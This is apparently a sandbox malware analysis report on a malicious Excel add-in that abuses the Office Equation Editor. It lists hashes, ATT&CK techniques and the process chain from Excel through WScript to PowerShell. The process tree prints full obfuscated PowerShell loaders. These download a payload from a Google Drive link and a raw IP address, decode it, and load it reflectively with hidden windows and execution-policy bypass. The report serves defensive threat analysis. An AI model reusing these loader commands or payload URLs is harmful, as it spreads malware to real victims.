1c807706a1bd874277a2b7bfc50f01e51340b2b55dd1894bf088e6780d8d3742

General

Target

1c807706a1bd874277a2b7bfc50f01e51340b2b55dd1894bf088e6780d8d3742.xlam
Size

660KB
MD5

9ab69e2024586e6b15194817176d81d1
SHA1

0ba9313a2b0d8f81226ea9f3dfc6bdb3d5a656e5
SHA256

1c807706a1bd874277a2b7bfc50f01e51340b2b55dd1894bf088e6780d8d3742
SHA512

1fb869351739101f6a7735d59bee00c3c5bb2210bbeee0210d578aea5c82ddc41f902685ed61a750a8b410b8e9cccd4feb2f836a86db562df6f35360d62c4fa8
SSDEEP

12288:nV+Gk+kB3ffiXmIOZ0ACqwuoCAiN1sQb8/+TBXC6tj2qoJkCE:VC+kBvfgOZ0ACioCAiNdbS+djZLoOCE

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1976	EQNEDT32.EXE
6	2576	powershell.exe
8	2576	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2720	powershell.exe
2576	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
6	drive.google.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1976	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2308	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2720	powershell.exe
2576	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2308	EXCEL.EXE
2308	EXCEL.EXE
2308	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 2896	1976	EQNEDT32.EXE	33
PID 1976 wrote to memory of 2896	1976	EQNEDT32.EXE	33
PID 1976 wrote to memory of 2896	1976	EQNEDT32.EXE	33
PID 1976 wrote to memory of 2896	1976	EQNEDT32.EXE	33
PID 2896 wrote to memory of 2720	2896	WScript.exe	34
PID 2896 wrote to memory of 2720	2896	WScript.exe	34
PID 2896 wrote to memory of 2720	2896	WScript.exe	34
PID 2896 wrote to memory of 2720	2896	WScript.exe	34
PID 2720 wrote to memory of 2576	2720	powershell.exe	36
PID 2720 wrote to memory of 2576	2720	powershell.exe	36
PID 2720 wrote to memory of 2576	2720	powershell.exe	36
PID 2720 wrote to memory of 2576	2720	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1c807706a1bd874277a2b7bfc50f01e51340b2b55dd1894bf088e6780d8d3742.xlam
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2308

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\eveningfridaymanagerman.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbTBpaW1hZ2VVcmwgPSBRSFRodHRwJysnczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnJysnSkpKdjFGNnZTNHNVT3libkgtc0R2VWgnKydCWXd1ciBRSFQ7bTBpd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDttMGlpbWFnZUJ5dGVzID0gbTBpd2ViQ2wnKydpZW50LkRvd25sb2FkRGF0YShtMGlpbWFnZVVybCk7bTBpaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcobTBpaW1hZ2VCeXRlcyk7bTBpc3RhcnRGJysnbGFnID0gUUhUPDxCQVNFNjRfU1RBUlQ+PlFIVDttMGllbmRGbGFnID0gUUhUPDxCQVNFNjRfRU5EPj5RSFQ7bTBpc3RhcnRJbmRleCA9JysnICcrJ20waWltYWdlVGV4dC5JbmRleE9mKG0waXN0YXJ0RmxhZyk7bTBpZW5kSW5kZXggPSBtMGlpbWFnZVRleHQuSW5kZXhPJysnZihtMGllbmQnKydGbGFnKTttMGlzdGFydEluZGV4IC1nZSAwIC1hbmQgbTBpZW4nKydkSW5kZXggLWd0IG0waXMnKyd0YScrJ3J0SW5kJysnZXg7JysnbTBpc3RhcnRJbmRleCArPSBtJysnMGlzdGFyJysndEZsYWcuTGVuZ3RoO20waWJhc2U2NExlbmd0aCA9IG0waWVuZEluZGV4IC0gbTBpc3RhcnRJbmRleDttMGliYXNlNjRDb21tYW5kID0gbTBpaW1hZ2VUZXh0LlN1YnN0cmluZyhtMGlzdGFydCcrJ0luZGV4LCBtMGliYXNlNjRMZW5ndGgpO20waWJhc2U2NFJldmVyc2UnKydkID0gLWpvaW4gKG0waWJhc2U2NENvbW1hbmQuVG9DaGFyQXInKydyYXkoKSBvZUggRm9yRWFjaC1PYmplY3QgeyBtMGlfIH0pWy0xLi4tKCcrJ20waWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bTBpY29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhc2U2NFN0cmluZygnKydtMGliYXNlNjRSZXZlcnNlZCk7bTBpbG9hZGVkQXNzZScrJ21ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG0waWNvbW1hbmRCeXRlcyk7bTBpdicrJ2FpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChRSFRWQUlRSFQpOycrJ20waXZhaU1ldGhvZC5JbnZvJysna2UobTBpbnVsbCwgQChRSFR0eHQnKycuYWFhYWFiZXdtYWRhbS8zMS4xMy4yNzEuNzAxLy86cHR0aFFIVCwgUUgnKydUZGVzYScrJ3RpdicrJ2Fkb1FIVCwgUUhUZGVzYXRpdmFkb1FIVCwgUUhUZGVzYXRpdmFkb1FIVCwgUUhUQWRkSW5Qcm8nKydjZXNzMzJRSFQsIFFIVGRlc2F0aXZhZG9RSCcrJ1QsIFFIVGRlc2F0aXZhZG9RSFQsUUhUZGVzYXRpdmFkb1FIVCxRSFRkZXNhdGl2YScrJ2RvUUhULFEnKydIVGRlc2F0aXZhZG9RSFQsUUhUZGVzYXRpdmFkb1FIVCxRSFRkZXNhdGl2JysnYScrJ2RvUScrJ0hULFFIVDFRSFQsUUhUZGVzYXRpdmFkb1FIVCkpOycpIC1yZXBMQWNlKFtDSEFSXTgxK1tDSEFSXTcyK1tDSEFSXTg0KSxbQ0hBUl0zOSAtcmVwTEFjZSAnb2VIJyxbQ0hBUl0xMjQtQ1JlUGxhQ0UnbTBpJyxbQ0hBUl0zNil8LiAoICRQU2hPTWVbNF0rJFBzaE9NRVszMF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('m0iimageUrl = QHThttp'+'s://drive.google.com/uc?export=download&id=1AIVg'+'JJJv1F6vS4sUOybnH-sDvUh'+'BYwur QHT;m0iwebClient = New-Object System.Net.WebClient;m0iimageBytes = m0iwebCl'+'ient.DownloadData(m0iimageUrl);m0iimageText = [System.Text.Encoding]::UTF8.GetString(m0iimageBytes);m0istartF'+'lag = QHT<<BASE64_START>>QHT;m0iendFlag = QHT<<BASE64_END>>QHT;m0istartIndex ='+' '+'m0iimageText.IndexOf(m0istartFlag);m0iendIndex = m0iimageText.IndexO'+'f(m0iend'+'Flag);m0istartIndex -ge 0 -and m0ien'+'dIndex -gt m0is'+'ta'+'rtInd'+'ex;'+'m0istartIndex += m'+'0istar'+'tFlag.Length;m0ibase64Length = m0iendIndex - m0istartIndex;m0ibase64Command = m0iimageText.Substring(m0istart'+'Index, m0ibase64Length);m0ibase64Reverse'+'d = -join (m0ibase64Command.ToCharAr'+'ray() oeH ForEach-Object { m0i_ })[-1..-('+'m0ibase64Command.Length)];m0icommandByte'+'s = [System.Convert]::'+'FromBase64String('+'m0ibase64Reversed);m0iloadedAsse'+'mbly = [System.Reflection.Assembly]::Load(m0icommandBytes);m0iv'+'aiMethod = [dnlib.IO.Home].GetMethod(QHTVAIQHT);'+'m0ivaiMethod.Invo'+'ke(m0inull, @(QHTtxt'+'.aaaaabewmadam/31.13.271.701//:ptthQHT, QH'+'Tdesa'+'tiv'+'adoQHT, QHTdesativadoQHT, QHTdesativadoQHT, QHTAddInPro'+'cess32QHT, QHTdesativadoQH'+'T, QHTdesativadoQHT,QHTdesativadoQHT,QHTdesativa'+'doQHT,Q'+'HTdesativadoQHT,QHTdesativadoQHT,QHTdesativ'+'a'+'doQ'+'HT,QHT1QHT,QHTdesativadoQHT));') -repLAce([CHAR]81+[CHAR]72+[CHAR]84),[CHAR]39 -repLAce 'oeH',[CHAR]124-CRePlaCE'm0i',[CHAR]36)|. ( $PShOMe[4]+$PshOME[30]+'X')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
223b944289f351a9429dbfc9a66e025c

SHA1
b0821d8f013c8430f0b58504906dc92577885114

SHA256
02d750d98cf25bf40b0797a52fe138f78ced2936878b3c8cedf92683eeb1d5ae

SHA512
f94a0638cf76c291e2ee439a0302439d4e7a01718b8d42d1912a5a6ccc121e65f9c947d391b67e0de615d819427e8b8c5be9815da427d474028d7f465097ef65

Download Submit
C:\Users\Admin\AppData\Roaming\eveningfridaymanagerman.vbs

Filesize
136KB

MD5
e5d1bc394f92f3ef342a12bc7bcc8b6e

SHA1
f124f6561f7a4302e866cad860231d8935522208

SHA256
5c13a18424006ae90aa56364939c4ca2e17292d7889cf194389ccf7e8bcab54b

SHA512
ca4c5c03070f5fa30a764559881de68ac7430290cebb95d0defbf54889422335b518c25cfdf032259e6ee7612184c8db31653a665169c4f2e866c1978063dffc

Download Submit
memory/2308-1-0x00000000724ED000-0x00000000724F8000-memory.dmp

Filesize
44KB

Download
memory/2308-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2308-16-0x00000000724ED000-0x00000000724F8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing